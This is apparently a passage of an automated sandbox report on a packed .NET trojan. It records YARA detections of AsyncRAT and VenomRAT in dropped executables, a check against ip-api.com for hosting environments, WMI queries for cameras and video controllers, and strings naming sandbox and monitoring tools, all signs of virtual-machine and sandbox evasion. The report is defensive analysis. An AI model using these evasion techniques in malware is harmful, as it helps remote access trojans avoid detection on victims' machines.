Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6152, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Infected.exe.0.dr, Loaader.exe.3.dr	Binary or memory string: SBIEDLL.DLLM{860BB310-5D01-11D0-BD3B-00A0C911CE86}
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Infected.exe.0.dr, Client.exe.0.dr, Loader.exe.2.dr, Loaader.exe.3.dr	Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Memory allocated: 27A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Memory allocated: 1A910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Memory allocated: A90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Memory allocated: 1A5E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Memory allocated: 770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Memory allocated: 1A300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 1520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 2ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 4ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 56E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 5520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 66E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 76E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 7B30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 8B30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 9B30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Memory allocated: 11D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Memory allocated: 1AB80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loader.exe	Memory allocated: 16A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loader.exe	Memory allocated: 1B140000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loader.exe	Memory allocated: F10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loader.exe	Memory allocated: 1A8C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Memory allocated: 15F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Memory allocated: 1B070000 memory reserve \| memory write watch
